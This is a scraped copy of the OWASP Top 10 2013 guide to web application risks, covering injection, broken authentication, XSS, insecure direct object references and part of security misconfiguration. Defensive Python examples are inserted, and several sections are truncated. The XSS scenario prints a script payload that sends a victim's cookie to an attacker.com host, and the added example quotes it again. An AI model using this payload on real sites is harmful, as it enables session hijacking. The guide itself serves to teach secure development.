(251289837) OWASP Top 10 - 2013.doc

Jun 02, 2018
  • 8/11/2019 (251289837) OWASP Top 10 - 2013.doc

    1/39


Foreword

Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our digital infrastructure gets increasingly complex and interconnected, the difficulty of achieving application security increases exponentially. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.

The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. This release of the OWASP Top 10 marks this project's tenth anniversary of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, with minor updates in 2004 and 2007. The 2010 version was revamped to prioritize by risk, not just prevalence. This 2013 edition follows the same approach.

We encourage you to use the Top 10 to get your organization started with application security. Developers can learn from the mistakes of other organizations. Executives should start thinking about how to manage the risk that software applications create in their enterprise.

In the long term, we encourage you to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes, and you should avoid attempting to do everything prescribed by some process model. Instead, leverage your organization's existing strengths to do and measure what works for you.

We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas, either publicly to owasp-topten@lists.owasp.org or privately to dave.wichers@owasp.org.

About OWASP

The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. At OWASP you'll find free and open ...

• Application security tools and standards
• Complete books on application security testing, secure code development, and secure code review
• Standard security controls and libraries
• Local chapters worldwide
• Cutting edge research
• Extensive conferences worldwide
• Mailing lists

Learn more at: https://www.owasp.org

All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. We advocate approaching application security as a people, process, and technology problem, because the most effective approaches to application security require improvements in all of these areas.

OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open source software projects, OWASP produces many types of materials in a collaborative, open way.

The OWASP Foundation is the non-profit entity that ensures the project's long-term success. Almost everyone associated with OWASP is a volunteer, including the OWASP Board,

Copyright 2003 – 2013 The OWASP Foundation

This document is released under the Creative Commons Attribution ShareAlike 3.0 license. For any reuse or distribution, you must make it clear to others the license terms of this work.

Introduction

Welcome

Welcome to the OWASP Top 10 2013! This update broadens one of the categories from the 2010 version to be more inclusive of common, important vulnerabilities, and reorders some of the others based on changing prevalence data. It also brings component security into the spotlight by creating a specific category for this risk, pulling it out of the obscurity of the fine print of the 2010 risk A6: Security Misconfiguration.

The OWASP Top 10 for 2013 is based on 8 datasets from 7 firms that specialize in application security, including 4 consulting companies and 3 tool/SaaS vendors (1 static, 1 dynamic, and 1 with both). This data spans over 500,000 vulnerabilities across hundreds of organizations and thousands of applications. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact estimates.

The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas, and also provides guidance on where to go from here.

Warnings

Don't stop at 10. There are hundreds of issues that could affect the overall security of a web application as discussed in the OWASP Developer's Guide and the OWASP Cheat Sheet Series. These are essential reading for anyone developing web applications.


Attribution

Thanks to Aspect Security for initiating, leading, and updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.

We'd like to thank those organizations that contributed their vulnerability prevalence data to support the 2013 update:

• Aspect Security – Statistics
• HP – Statistics from both Fortify and WebInspect
• Minded Security – Statistics
• Softtek – Statistics
• Trustwave, SpiderLabs – Statistics (See page 50)
• Veracode – Statistics
• WhiteHat Security Inc. – Statistics

We would like to thank everyone who contributed to previous versions of the Top 10. Without these contributions, it wouldn't be what it is today. We'd also like to thank those who contributed significant constructive comments and time reviewing this update to the Top 10:

• Adam Baso (Wikimedia Foundation)
• Mike Boberski (Booz Allen Hamilton)
• Torsten


Release Notes

What Changed From 2010 to 2013?

The threat landscape for applications security constantly changes. Key factors in this evolution are advances made by attackers, the release of new technologies with new weaknesses as well as more built in defenses, and the deployment of increasingly complex systems. To keep pace, we periodically update the OWASP Top 10. In this 2013 release, we made the following changes:

1) Broken Authentication and Session Management moved up in prevalence based on our data set. We believe this is probably because this area is being looked at harder, not because these issues are actually more prevalent. This caused Risks A2 and A3 to switch places.

2) Cross-Site Request Forgery (CSRF) moved down in prevalence based on our data set from 2010-A5 to 2013-A8. We believe this is because CSRF has been in the OWASP Top 10 for 6 years, and organizations and framework developers have focused on it enough to significantly reduce the number of CSRF vulnerabilities in real world applications.

3) We broadened Failure to Restrict URL Access from the 2010 OWASP Top 10 to be more inclusive:
   • 2010-A8: Failure to Restrict URL Access is now 2013-A7: Missing Function Level Access Control, to cover all of function level access control. There are many ways to specify which function is being accessed, not just the URL.

4) We merged and broadened 2010-A7 & 2010-A9 to CREATE: 2013-A6: Sensitive Data Exposure:
   • This new category was created by merging 2010-A7 – Insecure Cryptographic Storage & 2010-A9 – Insufficient Transport Layer Protection, plus adding browser side sensitive data risks as well. This new category covers sensitive data protection (other than access control which is covered by 2013-A4 and 2013-A7) from the moment sensitive data is provided by the user, sent to and stored within the application, and then sent back to the browser again.

5) We added: 2013-A9: Using Known Vulnerable Components:
   • This issue was mentioned as part of 2010-A6 – Security Misconfiguration, but now has a category of its own as the growth and depth of component based development has significantly increased the risk of using known vulnerable components.

OWASP Top 10 – 2010 (Previous)                        | OWASP Top 10 – 2013 (New)
A1 – Injection                                        | A1 – Injection
A3 – Broken Authentication and Session Management     | A2 – Broken Authentication and Session Management
A2 – Cross-Site Scripting (XSS)                       | A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References                | A4 – Insecure Direct Object References
A6 – Security Misconfiguration                        | A5 – Security Misconfiguration
A7 – Insecure Cryptographic Storage – Merged with A9  | A6 – Sensitive Data Exposure
A8 – Failure to Restrict URL Access – Broadened into  | A7 – Missing Function Level Access Control
A5 – Cross-Site Request Forgery (CSRF)                | A8 – Cross-Site Request Forgery (CSRF)


What's My Risk?

The OWASP Top 10 focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using the following simple ratings scheme, which is based on the OWASP Risk Rating Methodology.

Threat Agents  | Attack Vectors | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts
App Specific   | Easy           | Widespread          | Easy                   | Severe            | App / Business Specific
               | Average        | Common              | Average                | Moderate          |
               | Difficult      | Uncommon            | Difficult              | Minor             |

Only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference to your business. Therefore, you should evaluate each risk for yourself, focusing on the threat agents, security controls, and business impacts in your enterprise. We list Threat Agents as Application Specific, and Business Impacts as Application / Business Specific to indicate these are clearly dependent on the details about your application in your enterprise.

The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose names that accurately reflect the risks and, where possible, align with common terminology most likely to raise awareness.

References

OWASP
• OWASP Risk Rating Methodology
• Article on Threat/Risk Modeling

External
• FAIR Information Risk Framework
• Microsoft Threat Modeling (STRIDE and DREAD)

OWASP Top 10 Application Security Risks – 2013

A1 – Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2 – Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.

A3 – Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A4 – Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

A5 – Security Misconfiguration


A1 Injection

Threat Agents – Application Specific: Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

Attack Vectors – Exploitability EASY: Attacker sends simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.

Security Weakness – Prevalence COMMON, Detectability AVERAGE: Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, Xpath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, program arguments, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.

Technical Impacts – Impact SEVERE: Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.

Business Impacts – Application / Business Specific: Consider the business value of the affected data and the platform running the interpreter. All data could be stolen, modified, or deleted. Could your reputation be harmed?

Am I Vulnerable To Injection?

The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries.

Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.

Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.

How Do I Prevent Injection?

Preventing injection requires keeping untrusted data separate from commands and queries.

1. The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.

2. If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP's ESAPI provides many of these escaping routines.

3. Positive or "white list" input validation is also recommended, but is not a complete defense as many applications require special characters in their input. If special characters are required, only approaches 1. and 2. above will make their use safe. OWASP's ESAPI has an extensible library of white list input validation routines.
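The separation between data and query that the check above asks for, as an added example that is not part of the OWASP document: a dynamic (concatenated) SQL query beside a bound-parameter query, run against an in-memory SQLite table. The table, its rows and the inputs are constructed for this illustration.

```python
"""Added example (not from the OWASP document): a concatenated SQL query beside a
bound-parameter query, run against a constructed in-memory SQLite table."""
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[str, int]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a tiny accounts table; cust_id is the value the
    application receives from the user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (cust_id TEXT, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 250), ("1002", "bob", 900), ("O'Brien", "pat", 40)],
    )
    return conn


def find_account_dynamic(conn: sqlite3.Connection, cust_id: str) -> List[Row]:
    """The dynamic query the text says to avoid: untrusted input is spliced into
    the SQL text, so the interpreter cannot tell data from syntax."""
    sql = "SELECT owner, balance FROM accounts WHERE cust_id='" + cust_id + "'"
    return conn.execute(sql).fetchall()


def find_account_bound(conn: sqlite3.Connection, cust_id: str) -> List[Row]:
    """Option 1 from the text: a parameterized interface. The driver binds the
    '?' placeholder, so the input is always one literal value, whatever
    characters it contains."""
    sql = "SELECT owner, balance FROM accounts WHERE cust_id=?"
    return conn.execute(sql, (cust_id,)).fetchall()


def compare(cust_id: str) -> Tuple[Optional[List[Row]], List[Row]]:
    """Run both variants on the same input. The first element is None when the
    interpreter rejected the concatenated query with a syntax error, the
    symptom that poor error handling turns into an easy injection tell."""
    conn = make_db()
    try:
        dynamic: Optional[List[Row]] = find_account_dynamic(conn, cust_id)
    except sqlite3.OperationalError:
        dynamic = None
    bound = find_account_bound(conn, cust_id)
    conn.close()
    return dynamic, bound


if __name__ == "__main__":
    # Ordinary input: both variants agree.
    print(compare("1001"))
    # Legitimate data that happens to contain SQL syntax (an apostrophe): the
    # concatenated query breaks, the bound query still returns the exact row.
    print(compare("O'Brien"))
```

The apostrophe case is the same failure a crafted input exploits: once the interpreter parses user data as syntax, the query's meaning is no longer under the application's control.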

Example Attack Scenarios

Scenario #1: The application uses untrusted data in the construction of the following vulnerable SQL call:

String

References

OWASP
• OWASP SQL Injection Prevention Cheat Sheet
• OWASP Query Parameterization Cheat Sheet
• OWASP Command Injection Article
• OWASP XML eXternal Entity (XXE) Reference Article
• ASVS: Output Encoding/Escaping Requirements (V6)
• OWASP Testing Guide: Chapter on SQL Injection Testing

External
• CWE Entry 77 on Command Injection
• CWE Entry 89 on SQL Injection
• CWE Entry 564 on Hibernate Injection

A2 Broken Authentication and Session Management

Threat Agents – Application Specific: Consider anonymous external attackers, as well as users with their own accounts, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.

Attack Vectors – Exploitability AVERAGE: Attacker uses leaks or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to impersonate users.

Security Weakness – Prevalence WIDESPREAD, Detectability AVERAGE: Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.

Technical Impacts – Impact SEVERE: Such flaws may allow some or even all accounts to be attacked. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.

Business Impacts – Application / Business Specific: Consider the business value of the affected data or application functions. Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable to Hijacking?

Are session management assets like user credentials and session IDs properly protected? You may be vulnerable if:

1. User authentication credentials aren't protected when stored using hashing or encryption. See A6.
2. Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
3. Session IDs are exposed in the URL (e.g., URL rewriting).
4. Session IDs are vulnerable to session fixation attacks.
5. Session IDs don't timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren't properly invalidated during logout.
6. Session IDs aren't rotated after successful login.
7. Passwords, session IDs, and other credentials are sent over unencrypted connections. See A6.

See the ASVS requirement areas V2 and V3 for more details.

How Do I Prevent This?

The primary recommendation for an organization is to make available to developers:

1. A single set of strong authentication and session management controls. Such controls should strive to:
   a) meet all the authentication and session management requirements defined in OWASP's Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management).
   b) have a simple interface for developers. Consider the ESAPI Authenticator and User APIs as good examples to emulate, use, or build upon.

2. Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. See A3.
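An added example, not from the OWASP document, that turns the checklist above into a small server-side session store: unguessable IDs, rotation on login, idle timeout, server-side invalidation on logout, and a cookie header that keeps the ID out of the URL and off unencrypted connections. The class, the injectable clock, the timeout value and the user name are assumptions made for this illustration.

```python
"""Added example (not from the OWASP document): a minimal server-side session
store covering the checklist items above. The store, clock parameter, timeout
value and sample user are constructed for this illustration."""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed policy: expire after 15 idle minutes
COOKIE_NAME = "sessionid"


@dataclass
class Session:
    user: Optional[str]  # None until the visitor has authenticated
    last_seen: float


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._sessions: Dict[str, Session] = {}
        self._clock = clock  # injectable so expiry can be tested deterministically

    @staticmethod
    def _new_id() -> str:
        # 32 bytes from the OS CSPRNG: IDs cannot be guessed or enumerated
        # (checklist item 2, "weak session IDs").
        return secrets.token_urlsafe(32)

    def start(self) -> str:
        """Create an unauthenticated session (e.g. for a shopping cart)."""
        sid = self._new_id()
        self._sessions[sid] = Session(user=None, last_seen=self._clock())
        return sid

    def lookup(self, sid: str) -> Optional[Session]:
        """Resolve the ID presented in the cookie. Sessions idle longer than
        the timeout are discarded rather than revived (item 5)."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess.last_seen > IDLE_TIMEOUT_SECONDS:
            del self._sessions[sid]
            return None
        sess.last_seen = now
        return sess

    def login(self, old_sid: Optional[str], user: str) -> str:
        """Issue a fresh ID after successful authentication (item 6). The
        pre-login ID is dropped, so an ID planted or observed beforehand no
        longer maps to the authenticated session (item 4, fixation)."""
        if old_sid is not None:
            self._sessions.pop(old_sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = Session(user=user, last_seen=self._clock())
        return new_sid

    def logout(self, sid: str) -> None:
        """Invalidate on the server (item 5); clearing the cookie alone leaves
        the ID usable by anyone who captured it."""
        self._sessions.pop(sid, None)


def set_cookie_header(sid: str) -> str:
    """Carry the ID only in a cookie, never in the URL (item 3). Secure keeps
    it off unencrypted connections (item 7); HttpOnly keeps script injected
    via XSS from reading it (see A3)."""
    return f"{COOKIE_NAME}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def walkthrough(clock: Callable[[], float] = time.time) -> dict:
    """Exercise the store once and return the properties observed."""
    store = SessionStore(clock)
    anon = store.start()
    authed = store.login(anon, "alice")
    seen = {
        "rotated_on_login": authed != anon,
        "old_id_dead": store.lookup(anon) is None,
        "user_bound": store.lookup(authed).user == "alice",
    }
    store.logout(authed)
    seen["dead_after_logout"] = store.lookup(authed) is None
    return seen


if __name__ == "__main__":
    print(walkthrough())
    print(set_cookie_header(SessionStore().start()))
```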

Example Attack Scenarios

Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems;jsessionid=2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii

An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.

Scenario #2: Application's timeouts aren't set properly. User uses a public computer to access site. Instead of selecting "logout" the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.

Scenario #3: Insider or external attacker gains access to the system's password database. User passwords are not properly hashed, exposing every users' password to the attacker.

References

OWASP
For a more complete set of requirements and problems to avoid in this area, see the ASVS requirements areas for Authentication (V2) and Session Management (V3).
• OWASP Authentication Cheat Sheet
• OWASP Forgot Password Cheat Sheet
• OWASP Session Management Cheat Sheet
• OWASP Development Guide: Chapter on Authentication
• OWASP Testing Guide: Chapter on Authentication

External
• CWE Entry 287 on Improper Authentication
• CWE Entry 384 on Session Fixation

A3 Cross-Site Scripting (XSS)

Threat Agents – Application Specific: Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators.

Attack Vectors – Exploitability AVERAGE: Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database.

Security Weakness – Prevalence VERY WIDESPREAD, Detectability EASY: XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) Stored, 2) Reflected, and 3) DOM based XSS. Detection of most XSS flaws is fairly easy via testing or code analysis.

Technical Impacts – Impact MODERATE: Attackers can execute scripts in a victim's browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user's browser using malware, etc.

Business Impacts – Application / Business Specific: Consider the business value of the affected system and all the data it processes. Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable to XSS?

You are vulnerable if you do not ensure that all user supplied input is properly escaped, or you do not verify it to be safe via input validation, before including that input in the output page. Without proper output escaping or validation, such input will be treated as active content in the browser. If Ajax is being used to dynamically update the page, are you using safe JavaScript APIs? For unsafe JavaScript APIs, encoding or validation must also be used.

Automated tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, Flash, and Silverlight, making automated detection difficult. Therefore, complete coverage requires a combination of manual code review and penetration testing, in addition to automated approaches.

Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.

How Do I Prevent XSS?

Preventing XSS requires separation of untrusted data from active browser content.

1. The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.

2. Positive or "whitelist" input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.

3. For rich content, consider auto-sanitization libraries like OWASP's AntiSamy or the Java HTML Sanitizer Project.

4. Consider Content Security Policy (CSP) to defend against XSS across your entire site.

Example Attack Scenario

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

    (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in his browser to:

    '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.

This causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session.

Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ. See A8 for info on CSRF.
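An added example that is not part of the OWASP document: the scenario's snippet rendered without and with attribute-context escaping (option 1 of the prevention list), plus the whitelist check from option 2, run against the 'CC' value from the scenario. The function names, the request dictionary and the card-number format rule are assumptions made for this illustration.

```python
"""Added example (not from the OWASP document): the scenario's snippet rendered
without and with attribute-context escaping, plus the whitelist check from
option 2 above. Function names, the request dict and the format rule are
constructed for this illustration."""
import html
import re

# The 'CC' value from the scenario above, kept for comparison.
SCENARIO_CC = (
    "'><script>document.location="
    "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'"
)

_TAG_OPENER = re.compile(r"<\s*/?\s*[A-Za-z]")
_CC_FORMAT = re.compile(r"^[0-9]{13,19}$")  # assumed business rule for a card number


def render_unescaped(params: dict) -> str:
    """The vulnerable construction from the scenario: the parameter lands
    inside a single-quoted attribute with no escaping, so a quote in the
    input closes the attribute and anything after it is parsed as markup."""
    cc = params.get("CC", "")
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_escaped(params: dict) -> str:
    """Option 1: escape for the HTML attribute context. html.escape with
    quote=True rewrites & < > " and ' as entities, so the browser sees the
    whole value as attribute text, never as a tag boundary."""
    cc = html.escape(params.get("CC", ""), quote=True)
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def is_valid_cc(value: str) -> bool:
    """Option 2: whitelist validation on length and characters. Rejecting the
    scenario's input here is a second layer, not a replacement for escaping."""
    return bool(_CC_FORMAT.match(value))


def tag_openers(markup: str) -> int:
    """Count tag openers in a rendered fragment; the input element alone
    should account for exactly one."""
    return len(_TAG_OPENER.findall(markup))


if __name__ == "__main__":
    req = {"CC": SCENARIO_CC}
    print(tag_openers(render_unescaped(req)), render_unescaped(req))
    print(tag_openers(render_escaped(req)), render_escaped(req))
    print(is_valid_cc(SCENARIO_CC), is_valid_cc("4111111111111111"))
```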

References
OWASP
OWASP XSS Prevention Cheat Sheet (https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
OWASP DOM based XSS Prevention Cheat Sheet (https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet)
OWASP Cross-Site Scripting Article (https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))
ESAPI Encoder API (http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html)
ASVS: Output Encoding/Escaping Requirements (V6) (https://www.owasp.org/index.php/ASVS)
OWASP AntiSamy: Sanitization Library (https://www.owasp.org/index.php/AntiSamy)
Testing Guide: 1st 3 Chapters on Data Validation Testing (https://www.owasp.org/index.php/Testing_for_Data_Validation)
OWASP Code Review Guide: Chapter on XSS Review (https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting)
OWASP XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)

External
CWE Entry 79 on Cross-Site Scripting (http://cwe.mitre.org/data/definitions/79.html)

A4 Insecure Direct Object References

Threat Agents: Application Specific
Attack Vectors: Exploitability EASY
Security Weakness: Prevalence COMMON; Detectability EASY
Technical Impacts: Impact MODERATE
Business Impacts: Application / Business Specific

Threat Agents: Consider the types of users of your system. Do any users have only partial access to certain types of system data?

Attack Vectors: Attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn't authorized for. Is access granted?

Security Weakness: Applications frequently use the actual name or key of an object when generating web pages. Applications don't always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified.

Technical Impacts: Such flaws can compromise all the data that can be referenced by the parameter. Unless object references are unpredictable, it's easy for an attacker to access all available data of that type.

Business Impacts: Consider the business value of the exposed data. Also consider the business impact of public exposure of the vulnerability.

Am I Vulnerable?
The best way to find out if an application is vulnerable to insecure direct object references is to verify that all object references have appropriate defenses. To achieve this, consider:

1. For direct references to restricted resources, does the application fail to verify the user is authorized to access the exact resource they have requested?

2. If the reference is an indirect reference, does the mapping to the direct reference fail to limit the values to those authorized for the current user?

Code review of the application can quickly verify whether either approach is implemented safely. Testing is also effective for identifying direct object references and whether they are safe. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.

How Do I Prevent This?
Preventing insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename):

1. Use per user or session indirect object references. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource's database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The application has to map the per-user indirect reference back to the actual database key on the server. OWASP's ESAPI includes both sequential and random access reference maps that developers can use to eliminate direct object references.

2. Check access. Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.
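Both options above, as an added example in Python (this is not OWASP or ESAPI code; it is modelled on ESAPI's random access reference map idea). The account table, the user names, the handler names and the "acct" parameter handling are assumptions constructed for the example; the vulnerable handler mirrors the attack scenario's unverified use of the parameter.

```python
import secrets

# Constructed sample data: account id -> owner and balance (not real accounts).
ACCOUNTS = {
    "acct-1001": {"owner": "alice", "balance": 120.50},
    "acct-1002": {"owner": "alice", "balance": 9.99},
    "acct-2001": {"owner": "bob", "balance": 5000.00},
}


class AccessReferenceMap:
    """Per-user/session map from an opaque random token to a direct key.

    Only keys that were explicitly added for this user can be resolved, so a
    parameter value the user was never shown (another user's account id, or a
    guessed id) cannot be translated back into a database key. One instance
    per session; it must not be shared between users.
    """

    def __init__(self):
        self._to_direct = {}
        self._to_indirect = {}

    def add(self, direct_key):
        if direct_key not in self._to_indirect:
            token = secrets.token_urlsafe(12)  # unpredictable, unlike "1".."6"
            self._to_direct[token] = direct_key
            self._to_indirect[direct_key] = token
        return self._to_indirect[direct_key]

    def resolve(self, indirect_ref):
        try:
            return self._to_direct[indirect_ref]
        except KeyError:
            raise PermissionError("unknown object reference") from None


def account_picker(user, refmap):
    """Option 1: render the user's accounts using indirect references only."""
    return {refmap.add(acct_id): rec["balance"]
            for acct_id, rec in ACCOUNTS.items() if rec["owner"] == user}


def account_info_indirect(refmap, indirect_ref):
    """Handler for ?acct=<token>: the map itself limits what can be reached."""
    return ACCOUNTS[refmap.resolve(indirect_ref)]


def account_info_direct(user, acct_id):
    """Option 2: a direct reference is accepted, but every use is access-checked."""
    record = ACCOUNTS.get(acct_id)
    if record is None or record["owner"] != user:
        # Same failure for "missing" and "not yours": do not confirm the id exists.
        raise PermissionError("account not accessible")
    return record


def account_info_vulnerable(acct_id):
    """The flaw from the scenario: ?acct= is used with no verification at all."""
    return ACCOUNTS[acct_id]
```

With option 1 the server never parses a database key out of the request, so an attacker changing the parameter can at most produce an unknown-token error; with option 2 the key is accepted but ownership is checked before any data is returned.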

Example Attack Scenario
The application uses unverified data in a SQL call that is accessing account information:

http://example.com/app/accountInfo?acct=notmyacct

References
OWASP
OWASP Top 10-2007 on Insecure Direct Object References (https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference)
ESAPI Access Reference Map API (http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html)
ESAPI Access Control API (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction()) (http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html)
For additional access control requirements, see the ASVS requirements area for Access Control (V4) (https://www.owasp.org/index.php/ASVS).

External
CWE Entry 639 on Insecure Direct Object References (http://cwe.mitre.org/data/definitions/639.html)
CWE Entry 22 on Path Traversal (an example of a Direct Object Reference attack) (http://cwe.mitre.org/data/definitions/22.html)

A5 Security Misconfiguration

Threat Agents: Application Specific
Attack Vectors: Exploitability EASY
Security Weakness: Prevalence COMMON; Detectability EASY
Technical Impacts: Impact MODERATE
Business Impacts: Application / Business Specific

Threat Agents: Consider anonymous external attackers as well as users with their own accounts that may attempt to compromise the system. Also consider insiders wanting to disguise their actions.

Attack Vectors: Attacker accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.

Security Weakness: Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, framework, and custom code. Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.

Technical Impacts: Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise.

Business Impacts: The system could be completely compromised without you knowing it. All of your data could be stolen or modified slowly over time. Recovery costs could be expensive.

Am I Vulnerable to Attack?
Is your application missing the proper security hardening across any part of the application stack? Including:

1. Is any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, and all code libraries (see new A9).

2. Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?

3. Are default accounts and their passwords still enabled and unchanged?

4. Does your error handling reveal stack traces or other overly informative error messages to users?

5. Are the security settings in your development frameworks (e.g., Struts, Spring, ASP.NET) and libraries not set to secure values?

Without a concerted, repeatable application security configuration process, systems are at a higher risk.

How Do I Prevent This?
The primary recommendations are to establish all of the following:

